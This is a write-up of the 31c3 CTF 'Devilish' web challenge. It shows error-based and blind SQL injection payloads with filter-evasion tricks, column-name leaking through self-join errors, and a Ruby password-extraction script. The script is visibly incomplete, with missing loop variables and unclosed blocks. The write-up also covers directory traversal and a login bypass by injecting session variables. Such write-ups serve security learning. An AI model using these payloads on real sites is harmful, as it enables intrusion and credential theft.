31c3ctf Web Devilish write-up

In this challenge we were given access to a public website that they tell to be devilish, and might be hiding a private portal.

We had different menu entries but the two standing out were the login and members page, which allowed to view the user’s profile.

The login is not vulnearble to SQLi so better focus on the profile pages:

By fuzzing the 55 you can get to break the query with a backslash, obtaining this way a nice and verbose error:

<!--SELECT * FROM users WHERE id_user='55\' AND Us3rN4m3='Dracula'-->

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near
'Dracula'' at line 1

With this error, you see that Us3rN4m3 is also injectable, so the SQLi query must be placed there. Exploiting an error based SQLi should be easy, but in this case many important keywords and characters are filtered, such as SCHEMA, TABLE, LIKE, HAVING, whitespaces, single quotes, comments, etc.

By applying some filter evasion techniques and the extractvalue() clause you gan get a working injection that returns the username of a given id_user:\/||extractvalue(null,concat(0x3a,(select%09Us3rN4m3%09from%09users%09where%09id_user=54)))--%09

Since the column names are unknown and the information_schema table cannot be used because of the filter, the only way of getting them is by producing an error such as “duplicate colum name ‘id_user’“. This can be achieved by using a double query and joining the users table with itself, which will duplicate all the columns of the table. Therefore, the query that will leak the column names is:\/||(SELECT%09*%09FROM%09(SELECT%09*%09FROM%09users%09join%09users%09b%09USING%09(id_user))%09a)--%09

This query returns an error that says “Duplicate column name ‘Us3rN4m3’”, so in order to get all the column names, the known names must be placed within the USING clause. By doing this you can get all the column names:

Us3rN4m3, id_user, Em4iL4dR3Szz, S4cR3dT3xT0Fm3, MyPh0N3NumB3RHAHA, Addr3Zz0F_tHi5_D3wD, CHAR_LOL, P4sWW0rD_0F_M3_WTF

To extract the passwords from the colum “P4sWW0rD_0F_M3_WTF”, the extractvalue clause cannot be used because it has a length limitation and the passwords are too long. The way of getting the passwords is blindly, so we construct the base injection query:\/||locate(0x61,(select%09P4sWW0rD_0F_M3_WTF%09from%09users%09where%09id_user=54),1)=1--%09

This will try to locate the character ‘a’ (0x61) in the string returned by the select statement, starting at position 1. If the result is equal to 1 then the ‘a’ character is the first one of the password.

In order to automate the password extraction task a script like the following can be used:

#!/usr/bin/env ruby
# by zlowram (@zlowram_)

require 'net/http'

alphabet = ("a".."z").to_a + ("0".."9").to_a

found_char = true
print "Password: "

while found_char do
  found_char = false
    encoded_url = URI.escape("\\/||locate(0x"+letter.ord.to_s(16)+",(select%09P4sWW0rD_0F_M3_WTF%09from%09users%09where%09id_user=55),"+i.to_s+")="+i.to_s+"--%09")
    uri = URI.parse(encoded_url)

    res = Net::HTTP.get_response(uri)

    if (res.body =~ /KiTTyKiTTy/) != nil 
      print letter
      found_char = true
  i = i+1 

(Note: Here is the point we could reach within time, the rest of the challenge was done after the CTF was closed.)

Once logged in with the recently obtained credentials it can be observed a new menu entry: “ACCESS”. This section has two functionalities “browse” and “upload”, from wich the uploader appear to be broken.

The “browse” action has a Directory Traversal vulnerability that allows to list all the directories system-wide:

This vulnerability allow to list the source code files of the application to later access it directly and see their contents:

The source code of the web does not tell anything new yet so better try to find useful information with the directory traversal, which can be found in the apache2 sites-enabled directory:

It appear that a different vhost is available so the html root dir is somewhere in the system. Actually, it is in the home directory:

To access to this vhost the easiest thing is to add an entry to the /etc/hosts file in your machine. This allows to access to the private part of portal, which also contains a login form.

By extrapolating the source code filenames it is possible to read the LOGIN_HEAD file, which contains the source code of the login:

    if(@$_SESSION['is_ExclusiveMember']){header("location: ".$LINK);die();}
        if(@$_POST['user']===$uLOGIN && @$_POST['pass']===$uPASSWORD){
            header("location: ".$LINK);

In order to log in, the session variable named ‘is_ExclusiveMember’ must be set to 1. This can be done by sending it via POST in the public login form, as seen in the LOGIN_HEAD code of the public site ($_SESSION=$_POST):

    if(@$_SESSION['user']){header("location: ".$LINK);die();}
        if(mysqli_num_rows(mysqli_query($con,"SELECT * FROM users WHERE Us3rN4m3='".mysqli_real_escape_string($con,@$_POST['user'])."' AND P4sWW0rD_0F_M3_WTF='".mysqli_real_escape_string($con,@$_POST['pass'])."' "))>0){
            header("location: ".$LINK);die();

Once logged in with the ‘is_ExclusiveMember’ value set to 1, the flag can be obtained by simply accessing the devilish.local vhost.


Greetings to my team, Insanity, and specially to Xassiz and Kenkeiras for their help in this one!

Useful resources